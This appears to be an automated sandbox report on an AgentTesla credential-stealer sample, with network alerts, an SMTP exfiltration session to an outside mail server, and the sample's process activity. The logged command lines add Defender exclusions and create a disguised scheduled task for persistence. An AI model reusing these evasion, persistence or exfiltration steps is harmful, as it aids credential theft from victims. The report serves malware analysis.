                                                .rsrc0xaa0000x5ac0x600d0ad6e480a7c708cd40aef5d151ab94fFalse0.423828125data4.101457314667063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xac0000xc0x2004ece1db0d5e59280e03abec53da7b154False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0xaa0900x31cdata0.4371859296482412
                                                RT_MANIFEST0xaa3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                2024-07-25T23:35:36.103588+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973740.68.123.157192.168.2.4
                                                2024-07-25T23:35:25.918768+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49735587192.168.2.4199.79.62.115
                                                2024-07-25T23:35:29.982176+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49736587192.168.2.4199.79.62.115
                                                2024-07-25T23:35:55.569991+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435320152.165.165.26192.168.2.4
                                                2024-07-25T23:35:56.837685+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435320252.165.165.26192.168.2.4
                                                2024-07-25T23:35:11.625146+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249736587192.168.2.4199.79.62.115

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 25, 2024 23:35:23.876939058 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:23.885090113 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:23.885191917 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:24.793643951 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:24.794495106 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:24.794589043 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:24.794698000 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:24.799479961 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:24.949985027 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:24.950963974 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:24.957315922 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.107184887 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.107641935 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.112927914 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.390507936 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.405983925 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.410924911 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.560883045 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.563057899 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.568017006 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.735280037 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.740468979 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.745935917 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.903961897 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.918486118 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.918767929 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.918808937 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.918808937 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:25.923645020 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.923719883 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.923729897 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:25.924105883 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:26.176848888 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:26.249310017 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:28.116808891 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:28.121876955 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:28.121990919 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:28.767617941 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:28.768058062 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:28.773082972 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:28.989729881 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.050421000 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.056140900 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.211951971 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.225052118 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.230014086 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.386955023 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.437552929 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.444000959 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.599245071 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.600358963 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.605863094 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.816788912 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.819538116 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.830068111 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.981301069 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.982088089 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.982176065 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.982202053 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.982223034 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:35:29.987366915 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.987396955 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.987410069 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:29.987416983 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:30.144319057 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:30.365951061 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:35:30.366024017 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:03.532053947 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:03.538991928 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:03.890084028 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:03.890256882 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:03.890357971 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:03.890574932 CEST49735587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:03.895457029 CEST58749735199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:08.235577106 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:08.240905046 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:08.598304033 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:08.598356962 CEST58749736199.79.62.115192.168.2.4
                                                Jul 25, 2024 23:37:08.598412991 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:08.598515034 CEST49736587192.168.2.4199.79.62.115
                                                Jul 25, 2024 23:37:08.603815079 CEST58749736199.79.62.115192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 25, 2024 23:35:23.504205942 CEST6008253192.168.2.41.1.1.1
                                                Jul 25, 2024 23:35:23.823698997 CEST53600821.1.1.1192.168.2.4
                                                Jul 25, 2024 23:35:50.618299961 CEST5364188162.159.36.2192.168.2.4
                                                Jul 25, 2024 23:35:51.108766079 CEST5874053192.168.2.41.1.1.1
                                                Jul 25, 2024 23:35:51.116590023 CEST53587401.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 25, 2024 23:35:23.504205942 CEST192.168.2.41.1.1.10xae7Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                Jul 25, 2024 23:35:51.108766079 CEST192.168.2.41.1.1.10x6928Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 25, 2024 23:35:23.823698997 CEST1.1.1.1192.168.2.40xae7No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                Jul 25, 2024 23:35:51.116590023 CEST1.1.1.1192.168.2.40x6928Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Jul 25, 2024 23:35:24.793643951 CEST58749735199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:24 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Jul 25, 2024 23:35:24.794495106 CEST58749735199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:24 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Jul 25, 2024 23:35:24.794698000 CEST49735587192.168.2.4199.79.62.115EHLO 226546
                                                Jul 25, 2024 23:35:24.949985027 CEST58749735199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 226546 [8.46.123.33]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Jul 25, 2024 23:35:24.950963974 CEST49735587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                Jul 25, 2024 23:35:25.107184887 CEST58749735199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                                                Jul 25, 2024 23:35:25.390507936 CEST58749735199.79.62.115192.168.2.4235 Authentication succeeded
                                                Jul 25, 2024 23:35:25.405983925 CEST49735587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                Jul 25, 2024 23:35:25.560883045 CEST58749735199.79.62.115192.168.2.4250 OK
                                                Jul 25, 2024 23:35:25.563057899 CEST49735587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                Jul 25, 2024 23:35:25.735280037 CEST58749735199.79.62.115192.168.2.4250 Accepted
                                                Jul 25, 2024 23:35:25.740468979 CEST49735587192.168.2.4199.79.62.115DATA
                                                Jul 25, 2024 23:35:25.903961897 CEST58749735199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                                                Jul 25, 2024 23:35:25.918808937 CEST49735587192.168.2.4199.79.62.115.
                                                Jul 25, 2024 23:35:26.176848888 CEST58749735199.79.62.115192.168.2.4250 OK id=1sX67R-003JwV-2e
                                                Jul 25, 2024 23:35:28.767617941 CEST58749736199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:28 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Jul 25, 2024 23:35:28.768058062 CEST49736587192.168.2.4199.79.62.115EHLO 226546
                                                Jul 25, 2024 23:35:28.989729881 CEST58749736199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 226546 [8.46.123.33]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Jul 25, 2024 23:35:29.050421000 CEST49736587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                Jul 25, 2024 23:35:29.211951971 CEST58749736199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                                                Jul 25, 2024 23:35:29.386955023 CEST58749736199.79.62.115192.168.2.4235 Authentication succeeded
                                                Jul 25, 2024 23:35:29.437552929 CEST49736587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                Jul 25, 2024 23:35:29.599245071 CEST58749736199.79.62.115192.168.2.4250 OK
                                                Jul 25, 2024 23:35:29.600358963 CEST49736587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                Jul 25, 2024 23:35:29.816788912 CEST58749736199.79.62.115192.168.2.4250 Accepted
                                                Jul 25, 2024 23:35:29.819538116 CEST49736587192.168.2.4199.79.62.115DATA
                                                Jul 25, 2024 23:35:29.981301069 CEST58749736199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                                                Jul 25, 2024 23:35:29.982223034 CEST49736587192.168.2.4199.79.62.115.
                                                Jul 25, 2024 23:35:30.144319057 CEST58749736199.79.62.115192.168.2.4250 OK id=1sX67V-003Jyu-2t
                                                Jul 25, 2024 23:35:30.365951061 CEST58749736199.79.62.115192.168.2.4250 OK id=1sX67V-003Jyu-2t
                                                Jul 25, 2024 23:37:03.532053947 CEST49735587192.168.2.4199.79.62.115QUIT
                                                Jul 25, 2024 23:37:03.890084028 CEST58749735199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection
                                                Jul 25, 2024 23:37:08.235577106 CEST49736587192.168.2.4199.79.62.115QUIT
                                                Jul 25, 2024 23:37:08.598304033 CEST58749736199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:17:35:15
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                                                Imagebase:0xb30000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:17:35:18
                                                Start date:25/07/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                                                Imagebase:0xe20000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:17:35:18
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:17:35:18
                                                Start date:25/07/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                                                Imagebase:0xe20000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:17:35:18
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:17:35:18
                                                Start date:25/07/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                                                Imagebase:0x6a0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:17:35:19
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:17:35:19
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                                                Imagebase:0x2b0000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:17:35:19
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                                                Imagebase:0xa40000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:10
                                                Start time:17:35:20
                                                Start date:25/07/2024
                                                Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Imagebase:0xdf0000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:17:35:23
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff693ab0000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                                                Imagebase:0x6a0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                                                Imagebase:0x60000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                                                Imagebase:0x820000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:9.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:256
                                                  Total number of Limit Nodes:9
                                                  execution_graph 25526 130b020 25527 130b062 25526->25527 25528 130b068 GetModuleHandleW 25526->25528 25527->25528 25529 130b095 25528->25529 25836 130d300 DuplicateHandle 25837 130d396 25836->25837 25631 5a89d8b 25632 5a89af8 25631->25632 25632->25631 25633 5a89de6 25632->25633 25636 5a8ca80 25632->25636 25642 5a8ca71 25632->25642 25637 5a8ca95 25636->25637 25648 5a8cb1e 25637->25648 25668 5a8cac0 25637->25668 25687 5a8cab0 25637->25687 25638 5a8caa7 25638->25633 25643 5a8ca80 25642->25643 25645 5a8cb1e 12 API calls 25643->25645 25646 5a8cab0 12 API calls 25643->25646 25647 5a8cac0 12 API calls 25643->25647 25644 5a8caa7 25644->25633 25645->25644 25646->25644 25647->25644 25649 5a8caac 25648->25649 25650 5a8cb21 25648->25650 25657 5a8cafe 25649->25657 25706 5a8d2d1 25649->25706 25710 5a8d370 25649->25710 25715 5a8d4f0 25649->25715 25720 5a8d51f 25649->25720 25725 5a8d11d 25649->25725 25730 5a8cf1b 25649->25730 25734 5a8d07b 25649->25734 25740 5a8d047 25649->25740 25745 5a8d5a5 25649->25745 25750 5a8d305 25649->25750 25755 5a8d00e 25649->25755 25760 5a8d24d 25649->25760 25767 5a8d128 25649->25767 25773 5a8d4b5 25649->25773 25778 5a8d194 25649->25778 25783 5a8d5b3 25649->25783 25657->25638 25669 5a8cada 25668->25669 25670 5a8d128 2 API calls 25669->25670 25671 5a8d24d 4 API calls 25669->25671 25672 5a8d00e 2 API calls 25669->25672 25673 5a8d305 2 API calls 25669->25673 25674 5a8d5a5 2 API calls 25669->25674 25675 5a8d047 2 API calls 25669->25675 25676 5a8d07b 2 API calls 25669->25676 25677 5a8cf1b 2 API calls 25669->25677 25678 5a8cafe 25669->25678 25679 5a8d11d 2 API calls 25669->25679 25680 5a8d51f 2 API calls 25669->25680 25681 5a8d4f0 2 API calls 25669->25681 25682 5a8d370 2 API calls 25669->25682 25683 5a8d2d1 2 API calls 25669->25683 25684 5a8d5b3 2 API calls 25669->25684 25685 5a8d194 2 API calls 25669->25685 25686 5a8d4b5 2 API calls 25669->25686 25670->25678 25671->25678 25672->25678 25673->25678 25674->25678 25675->25678 25676->25678 25677->25678 25678->25638 25679->25678 25680->25678 25681->25678 25682->25678 25683->25678 25684->25678 25685->25678 25686->25678 25688 5a8cac0 25687->25688 25689 5a8d128 2 API calls 25688->25689 25690 5a8d24d 4 API calls 25688->25690 25691 5a8d00e 2 API calls 25688->25691 25692 5a8cafe 25688->25692 25693 5a8d305 2 API calls 25688->25693 25694 5a8d5a5 2 API calls 25688->25694 25695 5a8d047 2 API calls 25688->25695 25696 5a8d07b 2 API calls 25688->25696 25697 5a8cf1b 2 API calls 25688->25697 25698 5a8d11d 2 API calls 25688->25698 25699 5a8d51f 2 API calls 25688->25699 25700 5a8d4f0 2 API calls 25688->25700 25701 5a8d370 2 API calls 25688->25701 25702 5a8d2d1 2 API calls 25688->25702 25703 5a8d5b3 2 API calls 25688->25703 25704 5a8d194 2 API calls 25688->25704 25705 5a8d4b5 2 API calls 25688->25705 25689->25692 25690->25692 25691->25692 25692->25638 25693->25692 25694->25692 25695->25692 25696->25692 25697->25692 25698->25692 25699->25692 25700->25692 25701->25692 25702->25692 25703->25692 25704->25692 25705->25692 25788 5a89388 25706->25788 25792 5a89390 25706->25792 25707 5a8d2ef 25711 5a8d373 25710->25711 25796 5a89538 25711->25796 25800 5a89540 25711->25800 25712 5a8d3fa 25716 5a8d4f1 25715->25716 25804 5a88998 25716->25804 25808 5a88990 25716->25808 25717 5a8d946 25722 5a8d193 25720->25722 25721 5a8d81d 25722->25721 25812 5a89448 25722->25812 25816 5a89450 25722->25816 25726 5a8d3d8 25725->25726 25728 5a89538 ReadProcessMemory 25726->25728 25729 5a89540 ReadProcessMemory 25726->25729 25727 5a8d3fa 25728->25727 25729->25727 